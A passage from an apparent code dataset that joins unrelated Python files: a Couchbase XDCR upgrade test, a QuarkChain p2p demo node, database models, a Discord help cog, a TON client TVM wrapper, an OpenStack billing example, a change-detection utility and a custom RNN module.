self.index_name_prefix = None
self.rest_src = RestConnection(self.servers[0])
def tearDown(self):
super(XDCRUpgradeCollectionsTests, self).tearDown()
def enable_migration_mode(self, src_bucket, dest_bucket):
setting_val_map = {"collectionsMigrationMode": "true",
"colMappingRules": '{"REGEXP_CONTAINS(META().id,\'0$\')":"scope1.mycollection_scope1"}'
}
self.rest_src.set_xdcr_params(src_bucket, dest_bucket, setting_val_map)
def verify_doc_counts(self):
des_master = self.servers[self.nodes_init]
src_cbver = RestConnection(self.master).get_nodes_version()
des_cbver = RestConnection(des_master).get_nodes_version()
src_items = RestConnection(self.master).get_buckets_itemCount()
des_items = RestConnection(des_master).get_buckets_itemCount()
if src_cbver[:3] < "7.0" and des_cbver[:3] >= "7.0":
des_items = self.get_col_item_count(des_master, "default", "_default",
"_default", self.des_stat_col)
if src_items["default"] != des_items:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] < "7.0":
src_items = self.get_col_item_count(self.master, "default", "_default",
"_default", self.stat_col)
if src_items != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items, des_items["default"]))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] >= "7.0":
if src_items["default"] != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items["default"]))
def test_xdcr_upgrade_with_services(self):
after_upgrade_services_in = self.input.param("after_upgrade_services_in", False)
after_upgrade_buckets_in = self.input.param("after_upgrade_buckets_in", False)
after_upgrade_buckets_out = self.input.param("after_upgrade_buckets_out", False)
after_upgrade_buckets_flush = self.input.param("after_upgrade_buckets_flush", False)
# Install initial version on the specified nodes
self._install(self.servers[:self.nodes_init])
# Configure the nodes with services on cluster1
self.operations(self.servers[:self.nodes_init], services="kv,kv")
        # get the n1ql node which will be used in pre, during and post upgrade for running n1ql commands
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
# Run the pre upgrade operations, typically creating index
self.pre_upgrade(self.servers[:self.nodes_init])
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
self._install(self.servers[self.nodes_init:self.num_servers])
self.master = self.servers[self.nodes_init]
# Configure the nodes with services on the other cluster2
try:
self.operations(self.servers[self.nodes_init:self.num_servers], services="kv,kv")
self.sleep(timeout=10)
except Exception as ex:
if ex:
print("error: ", str(ex))
self.log.info("bucket is created")
# create a xdcr relationship between cluster1 and cluster2
self.rest_src.add_remote_cluster(self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port,
'Administrator', 'password', "C2")
repl_id = self.rest_src.start_replication('continuous', 'default', "C2")
if repl_id is not None:
self.log.info("Replication created successfully")
# Run the post_upgrade operations
self._create_ephemeral_buckets()
self.post_upgrade(self.servers[:self.nodes_init])
# Add new services after the upgrade
for upgrade_version in self.upgrade_versions:
src_nodes = self.servers[:self.nodes_init]
for server in src_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
src_upgrade_threads = self._async_update(upgrade_version, src_nodes)
for upgrade_thread in src_upgrade_threads:
upgrade_thread.join()
src_success_upgrade = True
while not self.queue.empty():
src_success_upgrade &= self.queue.get()
if not src_success_upgrade:
self.fail("Upgrade failed in source cluster. See logs above!")
else:
self.log.info("Upgrade source cluster success")
des_nodes = self.servers[self.nodes_init:self.num_servers]
self.master = self.servers[self.nodes_init]
for server in des_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
des_upgrade_threads = self._async_update(upgrade_version, des_nodes)
for upgrade_thread in des_upgrade_threads:
upgrade_thread.join()
des_success_upgrade = True
while not self.queue.empty():
des_success_upgrade &= self.queue.get()
if not des_success_upgrade:
self.fail("Upgrade failed in des cluster. See logs above!")
else:
self.log.info("Upgrade des cluster success")
self.master = self.servers[0]
self.rest = RestConnection(self.master)
self.rest_col = CollectionsRest(self.master)
self.cli_col = CollectionsCLI(self.master)
self.stat_col = CollectionsStats(self.master)
self.log.info("Create scope collection at src cluster")
#self.rest_col.create_scope_collection_count()
self._create_scope_collection(self.rest_col, self.cli_col, self.buckets[0].name)
self.sleep(10)
self.des_rest = RestConnection(self.servers[self.nodes_init])
self.des_rest_col = CollectionsRest(self.servers[self.nodes_init])
self.des_cli_col = CollectionsCLI(self.servers[self.nodes_init])
self.des_stat_col = CollectionsStats(self.servers[self.nodes_init])
self.log.info("Create scope collection at des cluster")
self.buckets = RestConnection(self.servers[self.nodes_init]).get_buckets()
self._create_scope_collection(self.des_rest_col, self.des_cli_col, self.buckets[0].name)
self.load_to_collections_bucket()
self.enable_migration = self.input.param("enable_migration", False)
if self.enable_migration:
self.enable_migration_mode(self.buckets[0].name, self.buckets[0].name)
self.verify_doc_counts()
if after_upgrade_buckets_in is not False:
self.bucket_size = 100
self._create_sasl_buckets(self.master, 1)
self._create_standard_buckets(self.master, 1)
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
gen_load = BlobGenerator('upgrade', 'upgrade-', self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", self.expire_time,
flag=self.item_flag)
# deleting buckets after upgrade
if after_upgrade_buckets_out is not False:
self._all_buckets_delete(self.master)
# flushing buckets after upgrade
if after_upgrade_buckets_flush is not False:
self._all_buckets_flush()
def run_view_queries(self):
view_query_thread = Thread(target=self.view_queries, name="run_queries",
args=(self.run_view_query_iterations,))
return view_query_thread
def view_queries(self, iterations):
query = {"connectionTimeout": 60000}
for count in range(iterations):
for i in range(self.view_num):
self.cluster.query_view(self.master, self.ddocs[0].name,
self.default_view_name + str(i), query,
expected_rows=None, bucket="default", retry_time=2)
def create_user(self, node):
self.log.info("inside create_user")
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'password': 'password'}]
rolelist = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'roles': 'admin'}]
self.log.info("before create_user_source")
RbacBase().create_user_source(testuser, 'builtin', node)
self.log.info("before add_user_role")
RbacBase().add_user_role(rolelist, RestConnection(node), 'builtin')
| 0.433022 | 0.128717 |
import argparse
import asyncio
from eth_keys import keys
import signal
from quarkchain.p2p import ecies
from quarkchain.p2p import kademlia
from quarkchain.p2p.cancel_token.token import CancelToken
from quarkchain.p2p.p2p_server import BaseServer
from quarkchain.p2p.tools.paragon import ParagonContext, ParagonPeer, ParagonPeerPool
from quarkchain.utils import Logger
NETWORK_ID = 999
class ParagonServer(BaseServer):
"""
a server using ParagonPeerPool (that creates paragon peers for demonstration purposes)
"""
def _make_peer_pool(self):
return ParagonPeerPool(
privkey=self.privkey,
context=ParagonContext(),
listen_port=self.port,
token=self.cancel_token,
)
def _make_syncer(self):
return
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--bootnodes",
default="enode://c571e0db93d17cc405cb57640826b70588a6a28785f38b21be471c609ca12fcb06cb306ac44872908f5bed99046031a5af82072d484e3ef9029560c1707193a0@127.0.0.1:29000",
type=str,
)
parser.add_argument(
"--privkey",
default="<KEY>",
help="hex string of private key; if empty, will be auto-generated",
type=str,
)
parser.add_argument(
"--listen_port",
default=29000,
help="port for discovery UDP and P2P TCP connection",
type=int,
)
parser.add_argument("--max_peers", default=10, type=int)
parser.add_argument("--logging_level", default="info", type=str)
parser.add_argument(
"--upnp",
default=False,
action="store_true",
help="if set, will automatically set up port-fowarding if upnp devices that support port forwarding can be found",
)
args = parser.parse_args()
Logger.set_logging_level(args.logging_level)
if args.privkey:
privkey = keys.PrivateKey(bytes.fromhex(args.privkey))
else:
privkey = ecies.generate_privkey()
cancel_token = CancelToken("server")
if args.bootnodes:
bootstrap_nodes = args.bootnodes.split(",")
else:
bootstrap_nodes = []
server = ParagonServer(
privkey=privkey,
port=args.listen_port,
network_id=NETWORK_ID,
bootstrap_nodes=tuple(
[kademlia.Node.from_uri(enode) for enode in bootstrap_nodes]
),
token=cancel_token,
upnp=args.upnp,
)
loop = asyncio.get_event_loop()
# loop.set_debug(True)
for sig in [signal.SIGINT, signal.SIGTERM]:
loop.add_signal_handler(sig, cancel_token.trigger)
loop.run_until_complete(server.run())
loop.run_until_complete(server.cancel())
loop.close()
if __name__ == "__main__":
main()
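# --- Hedged usage sketch (not part of the original script) ---
# Typical two-node local run (module path assumed from the repo layout, enode
# value illustrative): start a first node with no bootnodes, read its enode
# URI from the logs, then point a second node at it. Passing an empty
# --privkey makes the script auto-generate a key, as handled in main().
#   python -m quarkchain.p2p.poc.paragon_node --listen_port 29000 \
#       --privkey "" --bootnodes ""
#   python -m quarkchain.p2p.poc.paragon_node --listen_port 29001 \
#       --privkey "" --bootnodes "enode://<pubkey>@127.0.0.1:29000"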
|
quarkchain/p2p/poc/paragon_node.py
|
| 0.427277 | 0.114567 |
from SBaaS_base.postgresql_orm_base import *
class data_stage01_resequencing_endpoints(Base):
#TODO: rename to _group
__tablename__ = 'data_stage01_resequencing_endpoints'
id = Column(Integer, Sequence('data_stage01_resequencing_endpoints_id_seq'), primary_key=True)
experiment_id = Column(String(50))
analysis_id = Column(String(500))
sample_name = Column(String(100))
mutation_frequency = Column(Float)
mutation_type = Column(String(3))
mutation_position = Column(Integer)
mutation_data = Column(postgresql.JSON)
isUnique = Column(Boolean)
mutation_annotations = Column(postgresql.ARRAY(String(500)))
mutation_genes = Column(postgresql.ARRAY(String(25)))
mutation_locations = Column(postgresql.ARRAY(String(100)))
mutation_links = Column(postgresql.ARRAY(String(500)))
comment_ = Column(Text)
__table_args__ = (
UniqueConstraint('analysis_id','experiment_id','sample_name','mutation_type','mutation_position'),
)
def __init__(self,
row_dict_I,
):
self.experiment_id=row_dict_I['experiment_id'];
self.analysis_id=row_dict_I['analysis_id'];
self.sample_name=row_dict_I['sample_name'];
self.mutation_frequency=row_dict_I['mutation_frequency'];
self.mutation_type=row_dict_I['mutation_type'];
self.mutation_position=row_dict_I['mutation_position'];
self.mutation_data=row_dict_I['mutation_data'];
self.isUnique=row_dict_I['isUnique'];
self.mutation_annotations=row_dict_I['mutation_annotations'];
self.mutation_genes=row_dict_I['mutation_genes'];
self.mutation_locations=row_dict_I['mutation_locations'];
self.mutation_links=row_dict_I['mutation_links'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self, experiment_id_I,
analysis_id_I,
sample_name_I,
mutation_frequency_I,
mutation_type_I,
mutation_position_I,
mutation_data_I,
isUnique_I,
mutation_annotations_I,
mutation_genes_I,
mutation_locations_I,
mutation_links_I,
comment__I):
self.experiment_id=experiment_id_I
self.analysis_id=analysis_id_I
self.sample_name=sample_name_I
self.mutation_frequency=mutation_frequency_I
self.mutation_type=mutation_type_I
self.mutation_position=mutation_position_I
self.mutation_data=mutation_data_I
self.isUnique=isUnique_I
self.mutation_annotations=mutation_annotations_I
self.mutation_genes=mutation_genes_I
self.mutation_locations=mutation_locations_I
self.mutation_links=mutation_links_I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'experiment_id':self.experiment_id,
'analysis_id':self.analysis_id,
'sample_name':self.sample_name,
'mutation_frequency':self.mutation_frequency,
'mutation_type':self.mutation_type,
'mutation_position':self.mutation_position,
'mutation_data':self.mutation_data,
'isUnique':self.isUnique,
'mutation_annotations':self.mutation_annotations,
'mutation_genes':self.mutation_genes,
'mutation_locations':self.mutation_locations,
'mutation_links':self.mutation_links,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage01_resequencing_endpointLineages(Base):
#TODO: rename to _group
__tablename__ = 'data_stage01_resequencing_endpointLineages'
id = Column(Integer, Sequence('data_stage01_resequencing_endpointLineages_id_seq'), primary_key=True)
experiment_id = Column(String(50))
analysis_id = Column(String(500))
lineage_name = Column(String(100))
mutation_type = Column(String(3))
mutation_position = Column(Integer)
mutation_data = Column(postgresql.JSON)
isUnique = Column(Boolean)
mutation_annotations = Column(postgresql.ARRAY(String(500)))
mutation_genes = Column(postgresql.ARRAY(String(25)))
mutation_locations = Column(postgresql.ARRAY(String(100)))
mutation_links = Column(postgresql.ARRAY(String(500)))
comment_ = Column(Text)
__table_args__ = (
UniqueConstraint('analysis_id','experiment_id','lineage_name','mutation_type','mutation_position'),
)
def __init__(self,
row_dict_I,
):
self.experiment_id=row_dict_I['experiment_id'];
self.analysis_id=row_dict_I['analysis_id'];
self.lineage_name=row_dict_I['lineage_name'];
self.mutation_type=row_dict_I['mutation_type'];
self.mutation_position=row_dict_I['mutation_position'];
self.mutation_data=row_dict_I['mutation_data'];
self.isUnique=row_dict_I['isUnique'];
self.mutation_annotations=row_dict_I['mutation_annotations'];
self.mutation_genes=row_dict_I['mutation_genes'];
self.mutation_locations=row_dict_I['mutation_locations'];
self.mutation_links=row_dict_I['mutation_links'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self, experiment_id_I,
analysis_id_I,
lineage_name_I,
mutation_type_I,
mutation_position_I,
mutation_data_I,
isUnique_I,
mutation_annotations_I,
mutation_genes_I,
mutation_locations_I,
mutation_links_I,
comment__I):
self.experiment_id=experiment_id_I
self.analysis_id=analysis_id_I
self.lineage_name=lineage_name_I
self.mutation_type=mutation_type_I
self.mutation_position=mutation_position_I
self.mutation_data=mutation_data_I
self.isUnique=isUnique_I
self.mutation_annotations=mutation_annotations_I
self.mutation_genes=mutation_genes_I
self.mutation_locations=mutation_locations_I
self.mutation_links=mutation_links_I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'experiment_id':self.experiment_id,
'analysis_id':self.analysis_id,
'lineage_name':self.lineage_name,
'mutation_type':self.mutation_type,
'mutation_position':self.mutation_position,
'mutation_data':self.mutation_data,
'isUnique':self.isUnique,
'mutation_annotations':self.mutation_annotations,
'mutation_genes':self.mutation_genes,
'mutation_locations':self.mutation_locations,
'mutation_links':self.mutation_links,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
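# Usage sketch (hypothetical values and SQLAlchemy session; the Base/engine come from SBaaS_base):
# row = data_stage01_resequencing_endpoints({
#     'experiment_id': 'exp01', 'analysis_id': 'resequencing_01', 'sample_name': 'sample_1',
#     'mutation_frequency': 0.42, 'mutation_type': 'SNP', 'mutation_position': 12345,
#     'mutation_data': {}, 'isUnique': True, 'mutation_annotations': [],
#     'mutation_genes': ['geneA'], 'mutation_locations': ['coding'], 'mutation_links': [],
#     'comment_': None})
# session.add(row)          # 'session' is an assumed session bound to the SBaaS database
# session.commit()
# print(row.__repr__json__())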
|
SBaaS_resequencing/stage01_resequencing_endpoints_postgresql_models.py
|
| 0.178956 | 0.129733 |
from discord import *
from discord.ext.commands import *
class HelpButtons(ui.View):
def __init__(self):
super().__init__(timeout=None)
@ui.button(label="Home", emoji="<:home_button:918467896592719902>", style=ButtonStyle.red)
async def home(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Home",
description="""
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Utilities", emoji="<:utilities_button:918468783000150016>", style=ButtonStyle.green)
async def utilities(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Utilities",
description="""
`!github`: Check our organization on GitHub.
        `![developers|devs]`: Check the list of our developers.
`!codehelp`: Check how to ask for help.
`!report`: Report a member to the staff.
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Moderation", emoji="<:mod_button:918474582271356928>", style=ButtonStyle.green)
async def moderation(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Moderation",
description="""
`!lock [#channel] [reason]`: Lock a channel.
`!unlock [#channel] [reason]`: Unlock a channel.
`!kick <@user> [reason]`: Kick a user.
`!ban <@user> [reason]`: Ban a user.
`!mute <@user> [reason]`: Mute a user.
`!unmute <@user>`: Unmute a user.
`!slowmode <seconds>`: Set the slowmode.
`!clear <messages>`: Clear an amount of messages.
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Fun", emoji="<:fun_button:918478578054725632>", style=ButtonStyle.green)
async def fun(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Fun",
description="""
`!meme [subreddit]`: Get a meme from Reddit (add a subreddit name if you want the meme from that subreddit).
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
class Help(Cog):
def __init__(self, client):
self.client = client
@command(aliases=["h"])
async def help(self, ctx):
embed = Embed(
title="Home",
description="""
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await ctx.send(embed=embed, view=HelpButtons())
def setup(client):
client.add_cog(Help(client))
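# Usage sketch (assumed bot setup; the prefix, token and extension path are illustrative):
# bot = Bot(command_prefix="!", help_command=None)   # built-in help disabled so !help resolves to this cog
# bot.load_extension("cogs.help-command")            # extension path assumed from the repo layout
# bot.run("<TOKEN>")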
|
cogs/help-command.py
|
| 0.648132 | 0.211946 |
from tonclient.decorators import result_as
from tonclient.module import TonModule
from tonclient.types import ParamsOfRunExecutor, ResultOfRunExecutor, \
ParamsOfRunTvm, ResultOfRunTvm, ParamsOfRunGet, ResultOfRunGet
class TonTvm(TonModule):
""" Free TON tvm SDK API implementation """
@result_as(classname=ResultOfRunGet)
def run_get(self, params: ParamsOfRunGet) -> ResultOfRunGet:
"""
Executes a get method of FIFT contract.
Executes a get method of FIFT contract that fulfills the
smc-guidelines https://test.ton.org/smc-guidelines.txt and returns
the result data from TVM's stack
:param params: See `types.ParamsOfRunGet`
:return: See `types.ResultOfRunGet`
"""
return self.request(method='tvm.run_get', **params.dict)
@result_as(classname=ResultOfRunExecutor)
def run_executor(
self, params: ParamsOfRunExecutor) -> ResultOfRunExecutor:
"""
Emulates all the phases of contract execution locally.
Performs all the phases of contract execution on Transaction Executor -
the same component that is used on Validator Nodes.
Can be used for contract debugging, to find out the reason why a
message was not delivered successfully. Validators throw away the
failed external inbound messages (if they failed before `ACCEPT`) in
the real network. This is why these messages are impossible to debug
in the real network. With the help of run_executor you can do that.
In fact, `process_message` function performs local check with
`run_executor` if there was no transaction as a result of processing
and returns the error, if there is one.
Another use case to use `run_executor` is to estimate fees for message
execution. Set `AccountForExecutor::Account.unlimited_balance` to
`true` so that emulation will not depend on the actual balance.
This may be needed to calculate deploy fees for an account that does
not exist yet. JSON with fees is in `fees` field of the result.
One more use case - you can produce the sequence of operations,
thus emulating the sequential contract calls locally. And so on.
Transaction executor requires account BOC (bag of cells) as a
parameter. To get the account BOC - use `net.query` method to download
it from GraphQL API (field `boc` of `account`) or generate it with
        `abi.encode_account` method.
Also it requires message BOC. To get the message BOC - use
`abi.encode_message` or `abi.encode_internal_message`.
If you need this emulation to be as precise as possible
(for instance - emulate transaction with particular lt in particular
block or use particular blockchain config, downloaded from a
        particular key block) - then specify the `execution_options` parameter.
If you need to see the aborted transaction as a result, not as an
error, set `skip_transaction_check` to true.
:param params: See `types.ParamsOfRunExecutor`
:return: `types.ResultOfRunExecutor`
"""
return self.request(method='tvm.run_executor', **params.dict)
@result_as(classname=ResultOfRunTvm)
def run_tvm(self, params: ParamsOfRunTvm) -> ResultOfRunTvm:
"""
Executes get methods of ABI-compatible contracts.
Performs only a part of compute phase of transaction execution that is
used to run get-methods of ABI-compatible contracts.
If you try to run get methods with `run_executor` you will get an
error, because it checks `ACCEPT` and exits if there is none, which
is actually true for get methods.
To get the account boc (bag of cells) - use `net.query` method to
download it from graphql api (field `boc` of `account`) or generate
it with `abi.encode_account` method.
To get the message boc - use `abi.encode_message` or prepare it any
other way, for instance, with Fift script.
        Attention! Updated account state is produced as well, but only
`account_state.storage.state.data` part of the boc is updated.
:param params: See `types.ParamsOfRunTvm`
:return: See `types.ResultOfRunTvm`
"""
return self.request(method='tvm.run_tvm', **params.dict)
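# Usage sketch (illustrative; client construction and the BOC values are assumptions,
# not taken from this module):
# from tonclient.client import TonClient
# from tonclient.types import ParamsOfRunTvm
# client = TonClient(config=client_config)                    # assumed network config
# params = ParamsOfRunTvm(message=message_boc, account=account_boc)
# result = client.tvm.run_tvm(params=params)                  # ResultOfRunTvm
# print(result.out_messages, result.account)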
|
tonclient/tvm.py
|
| 0.865778 | 0.532304 |
from openstack import connection
# create connection
username = "xxxxxx"
password = "<PASSWORD>"
userDomainId = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # user account ID
auth_url = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # endpoint url
if __name__ == '__main__':
conn = connection.Connection(auth_url=auth_url,
user_domain_id=userDomainId,
domain_id=userDomainId,
username=username,
password=password)
data = {
"orderId": "CS1909211253I0LZZ",
"payAccountType": 2,
"bpId": "198bd648de5b4437aa569061c6ba0fc4",
"couponIds": [
"CP190921034223R7H1"
]
}
'''
A customer can invoke this API to pay yearly-monthly product orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.pay_period_order(userDomainId, **data)
print(ff)
data = {
"order_id": "CS1909211347TNTZY",
"unsub_type": 3,
"unsubscribe_reason_type": 2,
"unsubscribe_reason": "reason"
}
'''
    A customer can invoke this API to unsubscribe from yearly-monthly product orders in the subscribed, changing, or failed to be provisioned status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.unsubscribe_period_order(userDomainId, **data)
print(ff)
'''
A customer can invoke this API to cancel orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.cancel_order(userDomainId, orderId="CS1910091053TNVOZ", action_id="cancel")
print(ff)
data = {
"order_id": "CS1906131030ERCSE",
"offset": 1,
"limit": 10
}
'''
    A customer can invoke this API to query the details of an order.
This API can be invoked using the customer token only.
'''
ff = conn.bss.query_order_detail(userDomainId, **data)
print(ff)
data = {
"page_size": "1",
"page_index": "10"
}
'''
After a customer purchases yearly/monthly resources, it can query the orders in different statuses,
such as in the pending approval, processing, canceled, completed, and pending payment statuses.
This API can be invoked using the customer AK/SK or token.
'''
ff = conn.bss.query_order_list(userDomainId, **data)
print(ff)
'''
A customer can query the resources and original orders of the unsubscription amount for an unsubscription order or degrade order.
This API can be invoked using the AK/SK or token of the partner or the token of the partner's customer.
'''
ff = conn.bss.query_refund_order_amount(domain_id=userDomainId, order_id='CS1911122241QKILM')
print(ff)
'''
A customer can query resource details and provisioning status of an order on the partner sales platform.
This API can be invoked using the customer token only.
'''
ff = conn.bss.query_resource_status_by_orderId(userDomainId, order_id="CS1909211350H67DB")
print(ff)
|
examples/bss/v1/period_order.py
|
| 0.460289 | 0.228404 |
import numpy as np
import scipy.stats
from sklearn.cluster import KMeans, MiniBatchKMeans
from sklearn.preprocessing import StandardScaler
from skimage.feature import local_binary_pattern
from skimage.color import rgb2gray
def calculate_change_values(images, masks, n_clusters, num_samples_for_kmeans=10000, use_minibatch=False):
'''
Args:
        images: A list of `numpy.ndarray` of shape (height, width, n_channels). This imagery should cover an area that is larger than the parcel of interest by some fixed distance (i.e. a buffer value).
masks: A list of boolean `numpy.ndarray` of shape (height, width) with `1` in locations where the parcel covers and `0` everywhere else.
n_clusters: The number of clusters to use in the k-means model.
num_samples_for_kmeans: An integer specifying the number of samples to use to fit the k-means model. If `None` then all pixels in the neighborhood + footprint are used, however this is probably overkill.
use_minibatch: A flag that indicates whether we should use MiniBatchKMeans over KMeans. MiniBatchKMeans should be much faster.
Returns:
divergences: A list of KL-divergence values
'''
divergences = []
for image, mask in zip(images, masks):
h, w, c = image.shape
assert mask.shape[0] == h and mask.shape[1] == w
mask = mask.astype(bool)
# fit a k-means model and use it to cluster the image
if use_minibatch:
cluster_model = MiniBatchKMeans(n_clusters=n_clusters, n_init=3, batch_size=2000, compute_labels=True, init="random")
else:
cluster_model = KMeans(n_clusters=n_clusters, n_init=3)
features = image.reshape(h*w, c)
scaler = StandardScaler()
features = scaler.fit_transform(features)
if num_samples_for_kmeans is None or (h*w <= num_samples_for_kmeans):
labels = cluster_model.fit_predict(features)
else:
cluster_model.fit(features[np.random.choice(features.shape[0], size=num_samples_for_kmeans)])
labels = cluster_model.predict(features)
labels = labels.reshape(h,w)
# select the cluster labels that fall within the parcel and those outside of the parcel
parcel_labels = labels[mask]
neighborhood_labels = labels[~mask]
# compute the frequency with which each cluster occurs in the parcel and outside of the parcel
parcel_counts = np.bincount(parcel_labels.ravel(), minlength=n_clusters)
neighborhood_counts = np.bincount(neighborhood_labels.ravel(), minlength=n_clusters)
if parcel_labels.shape[0] > 0:
# normalize each vector of cluster index counts into discrete distributions
parcel_distribution = (parcel_counts + 1e-5) / parcel_counts.sum()
neighborhood_distribution = (neighborhood_counts + 1e-5) / neighborhood_counts.sum()
# compute the KL divergence between the two distributions
divergence = scipy.stats.entropy(parcel_distribution, neighborhood_distribution)
divergences.append(divergence)
else:
divergences.append(float('inf'))
return divergences
def calculate_change_values_with_color(images, masks):
'''
Args:
        images: A list of `numpy.ndarray` of shape (height, width, n_channels). This imagery should cover an area that is larger than the parcel of interest by some fixed distance (i.e. a buffer value).
masks: A list of boolean `numpy.ndarray` of shape (height, width) with `1` in locations where the parcel covers and `0` everywhere else.
Returns:
distances: A list of Euclidean distances
'''
distances = []
for image, mask in zip(images, masks):
h, w, c = image.shape
assert mask.shape[0] == h and mask.shape[1] == w
colors_inside = image[mask == 1].mean(axis=0)
colors_outside = image[mask == 0].mean(axis=0)
distances.append(np.linalg.norm(
colors_outside - colors_inside
))
return distances
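# Usage sketch (synthetic data; shapes and cluster count are illustrative):
# import numpy as np
# imgs = [np.random.rand(64, 64, 3) for _ in range(2)]        # two RGB-like patches
# masks = [np.zeros((64, 64), dtype=bool) for _ in range(2)]
# for m in masks:
#     m[16:48, 16:48] = True                                  # parcel footprint in the centre
# divergences = calculate_change_values(imgs, masks, n_clusters=8)
# distances = calculate_change_values_with_color(imgs, masks)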
|
utils/tcm_algorithms.py
|
| 0.858303 | 0.782372 |
import torch
import torch.nn as nn
import torch.nn.functional as F
class RnnCommon(nn.Module):
def __init__(self,
input_size,
hidden_size,
layer_num,
batch_first,
drop_out = 0.0,
biderction=True,
rnn_type = "LSTM"
):
super(RnnCommon,self).__init__()
self._rnn_type =rnn_type
self._input_size = input_size
self._hidden_size = hidden_size
self._layer_num = layer_num
self._bidirection = biderction
self._batch_first = batch_first
        self._num_direction = 2 if self._bidirection else 1
if self._rnn_type == "LSTM":
self._rnn_cell = nn.LSTMCell
elif self._rnn_type == "RNN":
self._rnn_cell = nn.RNNCell
elif self._rnn_type == "GRU":
self._rnn_cell = nn.GRUCell
        # build forward and backward cells for every layer (multi-layer support)
self._fw_cell = nn.ModuleList()
self._bw_cell = nn.ModuleList()
for i in range(self._layer_num):
layer_input_size = self._input_size if i == 0 else self._hidden_size*self._num_direction
self._fw_cell.append(self._rnn_cell(layer_input_size,self._hidden_size))
if self._bidirection:
self._bw_cell.append(self._rnn_cell(layer_input_size,self._hidden_size))
    def _forward(self, cell, input, init_hidden, mask):
        # input arrives as [seq_len, batch, input_size]; forward() has already
        # applied any batch-first transpose, so only the time dimension is read here
        seq_len = input.shape[0]
output = []
for i in range(seq_len):
if self._rnn_type == "LSTM":
h1,c1 = cell(input[i],init_hidden)
h1 = h1 * mask[i]
c1 = c1 * mask[i]
output.append(h1)
init_hidden =(h1,c1)
else:
h1 = cell(input[i],init_hidden)
h1 = h1 * mask[i]
output.append(h1)
init_hidden = h1
output = torch.stack(output,dim=0)
return output,init_hidden
    def _backward(self, cell, input, init_hidden, mask):
        # same layout convention as _forward: input is [seq_len, batch, input_size]
        seq_len = input.shape[0]
output = []
for i in reversed(range(seq_len)):
if self._rnn_type == "LSTM":
h1,c1= cell(input[i],init_hidden)
h1 = h1 * mask[i]
c1 = c1 * mask[i]
output.append(h1)
init_hidden = (h1,c1)
            else:
                h1 = cell(input[i], init_hidden)
                h1 = h1 * mask[i]
                output.append(h1)
                init_hidden = h1
        output.reverse()  # restore chronological order before stacking
        output = torch.stack(output, dim=0)
        return output, init_hidden
def forward(self, inputs,mask,init_hidden = None):
'''
:param inputs: [batch,seq,input_size] if batch_first
        :param init_hidden: optional initial hidden state; zeros are used when None
:param mask :[batch,seq]
:return:
'''
hn = []
cn = []
inputs = inputs.transpose(0,1) if self._batch_first else inputs
mask = mask.transpose(0,1)
        mask = mask.unsqueeze(dim=2).expand((-1, -1, self._hidden_size))
        if init_hidden is None:
            init_hidden = self.init_hidden(inputs.shape[1])
for i in range(self._layer_num):
#fw_output,bw_output of shape [seq_len,batch,hidden_size]
#fw_hn of shape [batch_size,hidden_size]
fw_output,fw_hidden =self._forward(self._fw_cell[i],inputs,init_hidden,mask)
if self._bidirection:
bw_output,bw_hidden = self._backward(self._bw_cell[i],inputs,init_hidden,mask)
if self._rnn_type == "LSTM":
hn.append(torch.cat((fw_hidden[0],bw_hidden[0]),dim=1) if self._bidirection else fw_hidden[0])
cn.append(torch.cat((fw_hidden[1],bw_hidden[1]),dim=1) if self._bidirection else fw_hidden[1])
else:
hn.append(torch.cat((fw_hidden,bw_hidden),dim=1) if self._bidirection else fw_hidden)
            inputs = torch.cat((fw_output, bw_output), dim=2) if self._bidirection else fw_output
        output = inputs.transpose(0, 1) if self._batch_first else inputs
hn = torch.stack(hn,dim=0)
if self._rnn_type =="LSTM":
cn = torch.stack(cn,dim=0)
